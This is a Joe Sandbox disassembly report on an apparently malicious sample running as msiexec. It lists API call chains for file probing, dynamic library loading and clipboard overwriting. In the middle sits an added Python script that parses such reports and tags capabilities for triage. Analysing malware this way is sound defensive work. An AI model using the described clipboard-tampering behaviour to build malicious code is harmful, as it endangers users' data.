                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: FreeLibrary
                                                                    • String ID:
                                                                    • API String ID: 3664257935-0
                                                                    • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                    • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                    • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                    • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                    APIs
                                                                    • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: EnumNamesResource
                                                                    • String ID:
                                                                    • API String ID: 3334572018-0
                                                                    • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                    • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                    • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                    • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                    APIs
                                                                    • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: FreeLibrary
                                                                    • String ID:
                                                                    • API String ID: 3664257935-0
                                                                    • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                    • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                    • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                    • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                    APIs
                                                                    • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: CloseFind
                                                                    • String ID:
                                                                    • API String ID: 1863332320-0
                                                                    • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                    • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                    • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                    • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                    APIs
                                                                    • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: AttributesFile
                                                                    • String ID:
                                                                    • API String ID: 3188754299-0
                                                                    • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                    • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                    • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                    • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                                    • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                    • Opcode Fuzzy Hash: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                                    • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                    APIs
                                                                    • memset.MSVCRT ref: 004095FC
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                      • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                      • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                      • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                    • String ID:
                                                                    • API String ID: 3655998216-0
                                                                    • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                    • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                    • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                    • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                    APIs
                                                                    • memset.MSVCRT ref: 00445426
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                      • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                      • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                    • String ID:
                                                                    • API String ID: 1828521557-0
                                                                    • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                    • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                    • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                    • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                    APIs
                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                      • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                    • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ??2@FilePointermemcpy
                                                                    • String ID:
                                                                    • API String ID: 609303285-0
                                                                    • Opcode ID: 9e8b65249caf6329f4b4caa46943be568ceb14fc1399993bad7d332d27558272
                                                                    • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                                                    • Opcode Fuzzy Hash: 9e8b65249caf6329f4b4caa46943be568ceb14fc1399993bad7d332d27558272
                                                                    • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: _wcsicmp
                                                                    • String ID:
                                                                    • API String ID: 2081463915-0
                                                                    • Opcode ID: 8ecd19cd50b91feb9ece7647b88d70c74935930258f67524a15d6916c2203edb
                                                                    • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                    • Opcode Fuzzy Hash: 8ecd19cd50b91feb9ece7647b88d70c74935930258f67524a15d6916c2203edb
                                                                    • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                    APIs
                                                                      • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                    • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: File$CloseCreateErrorHandleLastRead
                                                                    • String ID:
                                                                    • API String ID: 2136311172-0
                                                                    • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                    • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                    • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                    • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                    APIs
                                                                      • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ??2@??3@
                                                                    • String ID:
                                                                    • API String ID: 1936579350-0
                                                                    • Opcode ID: 89281d6a79f9a2f09b4aea459eeecc0a1f6d8faaa22ddda06fad7d30ca0037ac
                                                                    • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                    • Opcode Fuzzy Hash: 89281d6a79f9a2f09b4aea459eeecc0a1f6d8faaa22ddda06fad7d30ca0037ac
                                                                    • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: free
                                                                    • String ID:
                                                                    • API String ID: 1294909896-0
                                                                    • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                    • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                    • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                    • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: free
                                                                    • String ID:
                                                                    • API String ID: 1294909896-0
                                                                    • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                    • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                    • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                    • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: free
                                                                    • String ID:
                                                                    • API String ID: 1294909896-0
                                                                    • Opcode ID: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                                    • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                                                                    • Opcode Fuzzy Hash: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                                    • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E
                                                                    APIs
                                                                    • EmptyClipboard.USER32 ref: 004098EC
                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                    • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                    • GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                    • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                    • GetLastError.KERNEL32 ref: 0040995D
                                                                    • CloseHandle.KERNEL32(?), ref: 00409969
                                                                    • GetLastError.KERNEL32 ref: 00409974
                                                                    • CloseClipboard.USER32 ref: 0040997D
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                    • String ID:
                                                                    • API String ID: 3604893535-0
                                                                    • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                    • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                                    • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                    • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                                    APIs
                                                                    • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                    • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                    • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                    • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Library$AddressFreeLoadMessageProc
                                                                    • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                    • API String ID: 2780580303-317687271
                                                                    • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                    • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                    • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                    • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                    APIs
                                                                    • EmptyClipboard.USER32 ref: 00409882
                                                                    • wcslen.MSVCRT ref: 0040988F
                                                                    • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                    • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                                                    • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                    • CloseClipboard.USER32 ref: 004098D7
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                                    • String ID:
                                                                    • API String ID: 1213725291-0
                                                                    • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                    • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                                    • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                    • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
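The two clipboard entries above (EmptyClipboard, GlobalAlloc(GMEM_MOVEABLE), GlobalLock, copy, GlobalUnlock, SetClipboardData(0000000D), CloseClipboard; one variant fills the buffer from a file via CreateFileW/ReadFile, the other from a wide string via wcslen/memcpy) are the code behind the "Contains functionality to modify clipboard data" signature, and the comctl32.dll/InitCommonControlsEx entry is a LoadLibraryW/GetProcAddress pair. The script below is an added example, not part of the Joe Sandbox report or of Joe Sandbox itself: it parses function blocks in the layout used on this page ("APIs" list, "Part of subcall function" sub-entries, "Similarity" metadata), rebuilds each function's ordered API chain and derives coarse capability tags from it. 0x0D is the Win32 CF_UNICODETEXT clipboard format id; the tag names and the regexes are my own assumptions about the format, and the sample text is abridged from the entries shown above.

```python
"""Parse the per-function blocks of a Joe Sandbox disassembly report ("APIs", "Memory Dump
Source", "Similarity"), rebuild each function's ordered API chain and tag coarse capabilities,
e.g. EmptyClipboard -> GlobalAlloc -> GlobalLock -> SetClipboardData(CF_UNICODETEXT).
Added example for this page; not part of the report or of Joe Sandbox."""
import re
from collections import namedtuple
from dataclasses import dataclass, field

CF_UNICODETEXT = 0x0D  # Win32 clipboard format id, first argument of SetClipboardData

# "• Name.MODULE(arg,arg), ref: 0040991A" and the indented
# "• Part of subcall function 004096C3: Name.MODULE(...), ref: ..." variant.
API_RE = re.compile(
    r"^[•*-]?\s*(?:Part of subcall function (?P<caller>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[^\s.(]+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")
META_RE = re.compile(r"^[•*-]?\s*(?P<key>[A-Za-z][A-Za-z ]*?):\s*(?P<val>.*)$")  # "• Opcode ID: ..."
SECTION_LABELS = {"Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity", "Strings"}

ApiCall = namedtuple("ApiCall", "name module args ref caller")  # caller: sub-function address or None

@dataclass
class FunctionEntry:
    calls: list = field(default_factory=list)
    meta: dict = field(default_factory=dict)  # "Opcode ID", "API ID", "String ID", ...

    def direct_calls(self):
        return sorted((c for c in self.calls if c.caller is None), key=lambda c: c.ref)

    def direct_sequence(self):
        return [c.name for c in self.direct_calls()]

def parse_entries(text):
    entries, cur, in_apis = [], None, False
    for line in (l.strip() for l in text.splitlines()):
        if line == "APIs":                       # every function block starts with this label
            cur, in_apis = FunctionEntry(), True
            entries.append(cur)
        elif cur is None or line in SECTION_LABELS:
            in_apis = False
        elif in_apis and (m := API_RE.match(line)):
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            cur.calls.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16), m["caller"]))
        elif (m := META_RE.match(line)):
            cur.meta[m["key"]] = m["val"]
    return entries

def tag_capabilities(entry):
    seq = entry.direct_sequence()
    names = {c.name for c in entry.calls}        # direct calls plus those inside subcalls
    tags = []
    if ("EmptyClipboard" in seq and "SetClipboardData" in seq
            and seq.index("EmptyClipboard") < seq.index("SetClipboardData")):
        fmt = next((c.args[0] for c in entry.calls if c.name == "SetClipboardData" and c.args), "")
        fmt = int(fmt, 16) if re.fullmatch(r"[0-9A-Fa-f]+", fmt) else None
        tags.append("clipboard-write:CF_UNICODETEXT" if fmt == CF_UNICODETEXT
                    else "clipboard-write" if fmt is None else "clipboard-write:fmt=0x%X" % fmt)
        if {"CreateFileW", "ReadFile"} & names:  # the pasted buffer was read from a file
            tags.append("file-contents-to-clipboard")
    if {"LoadLibraryW", "GetProcAddress"} <= names:
        lib = next((c.args[0] for c in entry.calls if c.name == "LoadLibraryW" and c.args), "?")
        sym = next((c.args[1] for c in entry.calls if c.name == "GetProcAddress" and len(c.args) > 1), "?")
        tags.append("dynamic-import:%s!%s" % (lib, sym))
    if {"GetFileAttributesW", "FindClose", "FindFirstFileW", "FindNextFileW"} & names:
        tags.append("filesystem-probe")
    return tags

def triage(text):
    return [{"sequence": e.direct_sequence(), "tags": tag_capabilities(e),
             "opcode_id": e.meta.get("Opcode ID", "")} for e in parse_entries(text)]

# Constructed sample: three entries abridged from the report blocks above, in the report's own layout.
SAMPLE = """
APIs
• EmptyClipboard.USER32 ref: 004098EC
  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
• GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
• GlobalLock.KERNEL32(00000000), ref: 00409927
• ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
• GlobalUnlock.KERNEL32(00000000), ref: 0040994C
• SetClipboardData.USER32(0000000D,00000000), ref: 00409955
• CloseClipboard.USER32 ref: 0040997D
Similarity
• API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
• Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
APIs
• LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
• GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
• MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
Strings
APIs
• EmptyClipboard.USER32 ref: 00409882
• wcslen.MSVCRT ref: 0040988F
• GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
• GlobalLock.KERNEL32(00000000), ref: 004098AC
• memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
• GlobalUnlock.KERNEL32(00000000), ref: 004098BE
• SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
• CloseClipboard.USER32 ref: 004098D7
"""
```

Run triage(SAMPLE) (or feed it the text of a saved report) to get one row per function with its direct call sequence, its Opcode ID and the derived tags; the first sample entry yields clipboard-write:CF_UNICODETEXT plus file-contents-to-clipboard, the third yields clipboard-write:CF_UNICODETEXT only, and the comctl32 entry yields dynamic-import:comctl32.dll!InitCommonControlsEx. Ordering is taken from the call-site addresses, so a SetClipboardData that precedes EmptyClipboard is deliberately not tagged; calls that only appear inside "Part of subcall function" lines count for presence but not for ordering, since the report gives no position for them within the caller.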
                                                                    APIs
                                                                    • GetLastError.KERNEL32 ref: 004182D7
                                                                      • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                    • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                    • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                    • LocalFree.KERNEL32(?), ref: 00418342
                                                                    • free.MSVCRT ref: 00418370
                                                                      • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7591DF80,?,0041755F,?), ref: 00417452
                                                                      • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                    Similarity
                                                                    • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                    • String ID: OsError 0x%x (%u)
                                                                    • API String ID: 2360000266-2664311388
                                                                    • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                    • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                    • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                    • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                    APIs
                                                                      • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
